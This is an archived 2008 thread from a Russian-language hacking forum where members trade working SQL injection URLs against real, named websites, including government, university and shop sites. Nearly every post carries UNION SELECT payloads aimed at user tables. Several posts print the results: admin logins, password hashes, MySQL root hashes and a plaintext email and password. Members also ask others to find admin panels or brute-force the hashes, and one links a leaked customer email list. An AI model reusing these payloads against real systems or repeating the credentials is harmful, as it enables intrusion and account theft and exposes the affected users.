HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.10.2008, 17:12
Мистерео
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830

Репутация: 94
По умолчанию

Код:
http://www.iriver.com.ua/publication.php?newsid=1486+UNION+SELECT+1,2,3,4,5 /*
Хекнул = )
Код:
http://www.iriver.com.ua/publication.php?newsid=1486+UNION+SELECT+1,concat_ws(0x3a,login,password),3,4,5+from+users/*
Mary:c4ca4238a0b923820dcc509a6f75849b:1
Mary_admin:c81e728d9d4c2f636f067f89cc14862c:2
adm_price:063b610d39cfab2ec713e97510041189

= )

Админку не нашел кто найдет плиз скиньте в личку
 
Ответить с цитированием

  #2  
Старый 05.10.2008, 20:41
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Dimi4
Цитата:
http://www.iriver.com.ua/publication.php?newsid=-1486+union+select+1,concat_ws(0x3a,login,password) ,3,4,5+from+users/*
users
Цитата:
http://www.iriver.com.ua/publication.php?newsid=-1486+union+select+1,2,3,concat_ws(0x3a,user,passwo rd),5+from+mysql.user/*
vse 4to polu4ilos dostat.. load_file pohody ne pashet (

Dobby007

1. menshe slov, pishi 4etko problemy.

2. .php?article=-1+union+select+1,2,unhex(hex(column_name)), 4,5+from+information_schema.columns+where+table_na me=0x75736572+limit+1,1--

probui etot variant.

3. eta tema ne dla voprosov )

Последний раз редактировалось sabe; 05.10.2008 в 21:19..
 
Ответить с цитированием

  #3  
Старый 06.10.2008, 10:42
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

.gov


Код:
http://www.bulacan.gov.ph/newsarticle.php?id=-477+union+select+1,2,3,4,version(),6/*
5.0.45-community-nt
root:*46ADD2D575279110D198F0EBABA2CB760429D593:loc alhost
bulacan-gov:*F1E619E8130B161C9F41F8B876FB4F54AFBC0CBD:loca lhostt


Код:
http://www.sisonlgu.gov.ph/announce.php?id=-5+union+select+1,table_name,3,4+from+information_schema.tables/*
5.0.45-community-nt


Код:
http://www.mida.gov.my/en/news/view_news.php?id=-2776+union+select+version(),2,3,4/*
5.0.41-community-nt
root:*1BD747346D20A5AD9799A925D0E4FFFB43EF8378:loc alhost
midaweb:*1BD747346D20A5AD9799A925D0E4FFFB43EF8378: localhost




Код:
http://www.eastgrinstead.gov.uk/news/article.php?id=-250+union+select+version()/*
4.0.22-nt-log
 
Ответить с цитированием

  #4  
Старый 06.10.2008, 14:15
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

edu ,хз баян ли.
Цитата:
http://silverchips.mbhs.edu/module/poll/pollcomment.php?pid=-353+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Username: chipsadmin@localhost
Version: 5.0.51a-3ubuntu5.1-log
Dbname: silverchips

[mychips]
cole.brown@gmail.com:bigfishy
================================================== ==============
Цитата:
http://www.cccc.edu/directory/searchResult.php?search=a&radio=lName&ID=1{SQLINJ} &submit=Submit+Query%3E
Username: theDirectory@localhost
Version: 5.0.51b
Dbname: directory

admin:dir920
msteele:fatcow11

хз куда их тулить((
кто найдет - в личку плз..
 
Ответить с цитированием

  #5  
Старый 06.10.2008, 16:12
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию

Shops:
Цитата:
http://www.footballworldsgame.com/football-videos/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,email,pwd),3,4,5,6 %20,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.rephim.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,email,pwd),3,4,5,6 ,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.video-church.org/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,email,pwd),3,4,5,6 %20,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.paparazzi-online.net/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.itube.co.il/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.molecularstation.com/science-videos/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.avbulldogsmedia.ca/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.simpsy.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://ugonet.org/visions/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,email,pwd),3,4,5,6 ,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.foodtube.nl/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.dev.youedu.tv/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.yesdebtfree.org/videos/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.labaction.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://xianz.com/watch/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://video.polisriwijaya.ac.id/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://ebay4um.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://drlaurafanclub.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.private.canetoad.net/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.muslimvideos.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.pioneerhall.org/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.phillipsfoundation.net/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.theperfectaudition.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.i2hot.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.iamthebestamericanidol.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.rebanada.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.video-church.org/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.yufcosmetics.org/videofame/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.greenplanet-tv.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.youbechef.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.videoclipromance.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.vacationrentalsbyvideos.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.xoct.in/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://video.breakbeat.com.ua/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.securiteaerienne.net/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.axsinteractive.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.onlybelieve.tv/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.astroshorts.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.waterandwastewater.com/videos/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.jewtube.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://indostream.org/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.ripn6.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.b-roll.net/tv/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
 
Ответить с цитированием

Shops + email base
  #6  
Старый 06.10.2008, 20:31
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию Shops + email base

Shops:
Цитата:
http://www.spoofedtv.com/ugroups.php?UID=16+UNION+SELECT+1,concat_ws(0x3a,e mail,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+sig nup--
Цитата:
http://www.molecularstation.com/science-videos/ugroups.php?UID=-471+UNION+SELECT+1,concat_ws(0x3a,email,pwd),3,4,5 ,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.gospeltube.com/ugroups.php?UID=10641+UNION+SELECT+1,concat_ws(0x3 a,email,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+ signup--
Цитата:
http://www.footballworldsgame.com/football-videos/ugroups.php?UID=271+UNION+SELECT+1,concat_ws(0x3a, email,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+si gnup--
Цитата:
http://www.yesdebtfree.org/videos/ugroups.php?UID=1+UNION+SELECT+1,concat_ws(0x3a,em ail,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+sign up--
Цитата:
http://cctn.org/ugroups.php?UID=69+UNION+SELECT+1,concat_ws(0x3a,e mail,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+sig nup--
Argentina Lattin Shop (12296 members)
Цитата:
http://bardhzi.altervista.org/latin.txt
 
Ответить с цитированием

  #7  
Старый 06.10.2008, 20:47
nonamez
Познавший АНТИЧАТ
Регистрация: 22.07.2007
Сообщений: 1,291
Провел на форуме:
3884427

Репутация: 766


Отправить сообщение для nonamez с помощью ICQ
По умолчанию

Ну я тока начинаю в этой теме светится)))Но вот первые скули,правда пока не раскрученые))))

Цитата:
http://www.lzs.lt/?lt=1185259934&article=скуль
Точно знаю что можно дойти до конфига базы и затем лазить через пхпмайадмин.

Цитата:
mainyk.lt
Что-то на подобии минисоциальной сети только в литве...Уязвим почти каждый параметр id,но этого я не крутил....

Последний раз редактировалось nonamez; 06.10.2008 в 21:15..
 
Ответить с цитированием

  #8  
Старый 25.10.2008, 02:45
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Цитата:
Сообщение от nonamez  
Ну я тока начинаю в этой теме светится)))Но вот первые скули,правда пока не раскрученые))))



Точно знаю что можно дойти до конфига базы и затем лазить через пхпмайадмин.



Что-то на подобии минисоциальной сети только в литве...Уязвим почти каждый параметр id,но этого я не крутил....
http://www.lzs.lt/?lt=1185259934&article=1+union+select+1
user() - lzs@195.14.170.12
database() - lzs
version() - 4.0.18
дальше нет желания ибо геморно.
 
Ответить с цитированием

  #9  
Старый 25.10.2008, 03:03
keng
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189

Репутация: 124
По умолчанию

Цитата:
Сообщение от warlok  
http://www.lzs.lt/?lt=1185259934&article=1+union+select+1
user() - lzs@195.14.170.12
database() - lzs
version() - 4.0.18
дальше нет желания ибо геморно.
http://www.lzs.lt/?lt=1185259934&article=1+union+select+concat_ws(0x 20,name,pass)+from+users+where+id=300/*

Бруть наздоровье.
 
Ответить с цитированием

  #10  
Старый 06.10.2008, 22:17
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Erowid.org hacked by VITAL - Самый популярный сайт о накротиках pr 6
Цитата:
http://www.erowid.org//new.php?Y1=99999)+union+select+unhex(hex(version() ))/*
5.0.45-log
Цитата:
http://www.erowid.org/columns/teafaerie/wp-login.php
вот блог, нужно найти в базе таблу, база охретительно-большая..)
у кого чтото получится стучите в аську )

Svali.ru - pr 6
Цитата:
http://www.svali.ru/index.php?index=13&st_cmd=cmn_add&st_id=1698+union +select+1,2,3,4,5,6,table_name,8,9,10,11,12,13,14, 15,16,17,18+from+information_schema.tables/*
лог. вывод - 4 ветка.

nonamez
Цитата:
http://www.lzs.lt/?lt=1185259934&article=-1+union+select+version()/*
до конфига базы врятле доберешся... а вот юзеров можно поиметь..
Цитата:
http://www.lzs.lt/?lt=1185259934&article=-1+union+select+concat_ws(0x3a,user,pass)+from+user s/*
Цитата:
http://mainyk.lt/?pageid=20&id=-6013+union+select+version()#
да сайт действительно уязвим.. но чтото странное там творится, сейчас нету времени смотреть детальнее..

Последний раз редактировалось sabe; 07.10.2008 в 20:45..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ